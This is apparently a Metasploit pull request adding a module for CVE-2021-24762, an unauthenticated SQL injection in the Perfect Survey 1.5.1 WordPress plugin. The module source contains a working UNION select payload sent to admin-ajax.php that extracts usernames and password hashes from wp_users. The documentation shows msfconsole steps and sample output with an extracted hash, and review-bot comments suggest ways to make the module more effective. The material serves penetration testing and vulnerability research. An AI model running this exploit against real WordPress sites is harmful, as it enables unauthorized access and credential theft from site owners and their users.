New Auxiliary Module for CVE-2021-24762: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) #19701
Merged (14 commits), Dec 10, 2024
@@ -0,0 +1,51 @@
## Vulnerable Application

Perfect Survey, a WordPress plugin, version 1.5.1 is affected by an unauthenticated SQL injection vulnerability
via the `question_id` parameter.

An unauthenticated attacker can exploit this SQL injection vulnerability to retrieve sensitive information,
such as usernames and password hashes, from the `wp_users` table.

The vulnerable plugin can be downloaded from the [WordPress plugin repository](https://wordpress.org/plugins/).
The specific vulnerable version can be found here: https://www.exploit-db.com/apps/51c80e6262c3a39fa852ebf96ff86b78-perfect-survey.1.5.1.zip

## Verification Steps

1. Install the WordPress application and the vulnerable version of the Perfect Survey plugin.
2. Start `msfconsole`.
3. Run: `use auxiliary/scanner/http/wp_perfect_survey_sqli`.
4. Set the target host: `set RHOSTS [ip]`.
5. Adjust other options as necessary, such as `TARGETURI` (default is `/`).
6. Execute the module: `run`.
7. The module should retrieve usernames and password hashes from the WordPress installation.

## Options

### SHOW_FULL_RESPONSE
If set to `true`, the module will print the entire JSON response received from the server when username and password hash extraction fails.
Default is `false`.

## Scenarios

### WordPress with Perfect Survey Plugin 1.5.1 on Ubuntu 20.04

#### Example

```sh
msf6 > use auxiliary/scanner/http/wp_perfect_survey_sqli
[*] Using auxiliary/scanner/http/wp_perfect_survey_sqli
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RPORT 8000
RPORT => 8000
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > exploit
[*] Running module against 192.168.1.104

[*] Exploiting SQLi in Perfect Survey plugin...
[+] Received a response from the server!
[+] Extracted Username: aaryan
[+] Extracted Password Hash: $P$BroxbUQTM0N32U7JeMmkXPJrxN9ErZ1
[*] Auxiliary module execution completed
```
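Review bot: the Scenarios transcript does not match what the module actually prints. `print_status('Received a response from the server!')` emits a `[*]` line, not the `[+]` shown, and the success path prints a single line, `Extracted credentials: aaryan:$P$...`, rather than the separate `[+] Extracted Username:` / `[+] Extracted Password Hash:` lines in the example, so the sample output should be regenerated from a real run of the module as submitted. Minor: step 6 says `run` while the transcript uses `exploit`; both work for auxiliary modules, but keep them consistent. The "WordPress plugin repository" link points at the generic plugin index rather than the Perfect Survey page, so only the exploit-db zip actually locates the vulnerable version; either link the plugin page directly or drop the generic link.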
87 changes: 87 additions & 0 deletions modules/auxiliary/scanner/http/wp_perfect_survey_sqli.rb
@@ -0,0 +1,87 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress Plugin Perfect Survey 1.5.1 SQLi (Unauthenticated)',
'Description' => %q{
This module exploits a SQL injection vulnerability in the Perfect Survey
plugin for WordPress (version 1.5.1). An unauthenticated attacker can
exploit the SQLi to retrieve sensitive information such as usernames
and password hashes from the `wp_users` table.
},
'Author' => [
'Aaryan Golatkar', # Metasploit Module Creator
'Ron Jost' # Vulnerability discovery
],
'License' => MSF_LICENSE,
'References' => [
['EDB', '50766'],
['CVE', '2021-24762']
],
'DisclosureDate' => '2021-10-05',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path to the WordPress installation', '/']),
OptBool.new('SHOW_FULL_RESPONSE', [false, 'Show the entire JSON response if username and password hash are not extracted', false]),
Opt::RPORT(80) # Default port for HTTP
])
end

def run
print_status('Exploiting SQLi in Perfect Survey plugin...')

# The vulnerable endpoint
endpoint = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')

# SQL injection payload
sqli_payload = '1 union select 1,1,char(116,101,120,116),user_login,user_pass,0,0,null,null,null,null,null,null,null,null,null from wp_users'

# HTTP GET request parameters
params = {
'action' => 'get_question',
'question_id' => sqli_payload
}

# Send the request
res = send_request_cgi({
'uri' => endpoint,
'method' => 'GET',
'vars_get' => params
})

fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::Unknown, 'Unexpected reply from the server') unless res.code == 200

print_status('Received a response from the server!')

html_content = res.get_json_document['html']
fail_with(Failure::Unknown, 'HTML content is empty') unless html_content

# Use regex to extract username and the password hash
match_data = /survey_question_p">([^<]+)[^$]+(\$P\$[^"]+)/.match(html_content)
if match_data
username, password_hash = match_data.captures
print_good("Extracted credentials: #{username}:#{password_hash}")
else
print_warning('Could not extract username and password hash. Try enabling SHOW_FULL_RESPONSE.')
print_status("Full Response (HTML):\n#{html_content}") if datastore['SHOW_FULL_RESPONSE']
end
rescue JSON::ParserError => e
fail_with(Failure::UnexpectedReply, "Failed to parse response as JSON: #{e.message}")
end
end
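Review bot: the empty-response guard in `run` never fires: `fail_with(Failure::Unknown, 'HTML content is empty') unless html_content` only trips on `nil`, and an empty string is truthy in Ruby, so a `{"html":""}` reply falls through to the regex and ends in the generic warning; use `html_content.blank?` (or `.to_s.empty?`). Related: `res.get_json_document['html']` assumes the parsed body is a Hash, and a scalar body (admin-ajax.php answers with a bare `0` when no handler is registered for the `action`, i.e. plugin absent or disabled) will raise instead of failing cleanly; check `is_a?(Hash)` first and report "plugin not detected" with `Failure::NotVulnerable`. Two functional limits should be either fixed or stated in the description: the payload hardcodes `wp_users`, so targets with a non-default table prefix return nothing, and the regex captures only the first row of the UNION result, so at most one user is ever reported even though the query returns every row. Extracted credentials should also be stored with `store_valid_credential`/`create_credential` (Msf::Auxiliary::Report) rather than only printed, so they land in `creds`. Style: the module sits under `scanner/http/` but does not include `Msf::Auxiliary::Scanner` or implement `run_host(ip)`, and `Opt::RPORT(80)` duplicates the option `Msf::Exploit::Remote::HttpClient` already registers.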